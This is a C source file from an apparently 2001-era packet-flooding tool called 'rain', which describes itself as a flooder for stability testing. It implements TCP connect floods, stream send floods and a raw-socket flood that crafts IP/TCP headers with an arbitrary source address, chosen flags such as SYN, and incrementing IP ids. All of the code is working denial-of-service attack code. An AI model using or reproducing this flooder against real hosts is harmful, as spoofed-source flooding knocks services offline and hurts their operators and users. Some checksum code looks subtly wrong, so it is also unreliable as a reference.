/*--------------------------------------------------*
 * $Header: /usr/src/Projects/rain/RCS/rain_tcp.c,v 1.1 2001/06/11 20:44:09 root Exp root $
 * $Author: root $
 * rain_tcp.c
 * rain - by Evil (mystic@tenebrous.com)
 * A flexible packet flooder for testing stability.
 * Copyright(c) 2001
 * Licensed under the GNU General Public License
 *
 * $Log: rain_tcp.c,v $
 * Revision 1.1  2001/06/11 20:44:09  root
 * Initial revision
 *
 * Revision 1.1  2001/06/11 02:59:26  root
 * Initial revision
 *
 *-------------------------------------------------*/

#include "rain_common.h"

extern void
tcp_info_init(struct pkt_info_tcp *pkttcp) {
  if(pkttcp->ack == 1) strcpy(tcpinfo, "ACK");
  if(pkttcp->urg == 1) strcpy(tcpinfo, "URG");
  if(pkttcp->psh == 1) strcpy(tcpinfo, "PSH");
  if(pkttcp->rst == 1) strcpy(tcpinfo, "RST");
  if(pkttcp->syn == 1) strcpy(tcpinfo, "SYN");
  if(pkttcp->fin == 1) strcpy(tcpinfo, "FIN");
}

extern
int tcp_shower_connect(struct sockaddr_in *target, struct pkt_info *pkt)
{
  int sock;
  buffer = malloc(sizeof(char)*packetsize);
  memset(buffer, 0xFF, (sizeof(char)*packetsize));


  while (packets_sent < pkt->num) {
    if((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
      DieWithError("socket(SOCK_STREAM)");

    if((connect(sock, (struct sockaddr*)target, sizeof(struct sockaddr_in))) < 0)
      DieWithError("connect()");

    close(sock);    

    usleep(pkt->delay);    

    packets_sent++;
  }

  return 0;
}

extern 
int tcp_shower_stream(struct sockaddr_in *target, struct pkt_info *pkt) 
{
  int sock;
  buffer = malloc(sizeof(char)*packetsize);
  memset(buffer, 0xFF, (sizeof(char)*packetsize));

  if((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
    DieWithError("socket(SOCK_STREAM)");

  if((connect(sock, (struct sockaddr*)target, sizeof(struct sockaddr_in))) < 0)
    DieWithError("connect()");

  while (packets_sent < pkt->num) {
    if((send(sock, buffer, strlen(buffer), 0)) < 0)
      DieWithError("normal TCP send()");

    usleep(pkt->delay);

    packets_sent++;
  }

  close(sock);
  return 0;
}

extern int 
tcp_shower(int raw_socket, struct sockaddr_in *source, struct sockaddr_in *target, struct pkt_info *pkt, struct pkt_info_tcp *pkttcp)
{
  struct iptcp *tcpsyn;
  struct iphdr   *ip;
  struct tcphdr *tcp;

/* We use a global buffer to ward off memory leaks *
 * it will be freed when the program exits         */
  buffer = malloc(sizeof(char)*packetsize);
  tcpsyn = (struct iptcp*)buffer;
  ip = &tcpsyn->ip;
  tcp = &tcpsyn->tcp;

  memset(buffer, 0xFF, (sizeof(char)*packetsize));

  pkt->tot_len = (sizeof(struct tcphdr) + strlen(buffer));

  tcp->source = htons(pkt->sport);
  tcp->dest   = htons(pkt->dport);
  tcp->seq    = htons(pkttcp->seq);
  tcp->doff   = 0x0;  /* we really shouldn't set the data offset. Let the kernel do that.. */
  tcp->urg    = pkttcp->urg;
  tcp->psh    = pkttcp->psh;
  tcp->rst    = pkttcp->rst;
  tcp->syn    = pkttcp->syn;
  tcp->ack    = pkttcp->ack;
  tcp->fin    = pkttcp->fin;
  if(tcp->urg == 1) { tcp->urg_ptr = htons(0xFF); }
  if(tcp->ack == 1) { tcp->ack_seq = htons(pkttcp->ack_seq); }
  tcp->window = htons(pkttcp->window);
  tcp->check  = in_cksum((u_short*)tcp,sizeof(tcp));

  pkt->tot_len += sizeof(struct iphdr);

  ip->version  = 4;
  ip->ihl      = (sizeof(struct iphdr) >> 2);
  ip->tos      = pkt->tos;
  ip->tot_len  = pkt->tot_len;
  ip->id       = htons(pkt->id);
  if(pkt->frag == 1) {
    ip->frag_off = htons(pkt->frag_off);  /* set fragment offset */
    ip->frag_off |= htons(0x2000);  /* set DO fragment bit */
  } else {
    ip->frag_off = 0x0;  /* don't fragment */
  }
  ip->ttl      = pkt->ttl;
  ip->protocol = IPPROTO_TCP;
  ip->saddr    = source->sin_addr.s_addr;
  ip->daddr    = target->sin_addr.s_addr;
  ip->check    = in_cksum((u_short*)ip,sizeof(ip));

  while(packets_sent < pkt->num) {
    if(sendto(raw_socket,
              tcpsyn,
              pkt->tot_len,
              0,
              (struct sockaddr*)target,
              sizeof(struct sockaddr_in)) < 0) return -1;

    /* If this is an ACK packet, we'll increase the acknowledgement sequence */
    if(tcp->ack == 1) { tcp->ack_seq++; tcp->check = in_cksum((u_short*)tcp, sizeof(tcp)); }

    packets_sent++;

    /* for id overloading: */
    if(pkt->id_of == 1) { ip->id++; ip->id = htons(ip->id) ; ip->check = in_cksum((u_short*)ip, sizeof(ip)); }
    usleep(pkt->delay);
  }
 
  return 0;
}


/* EOF */
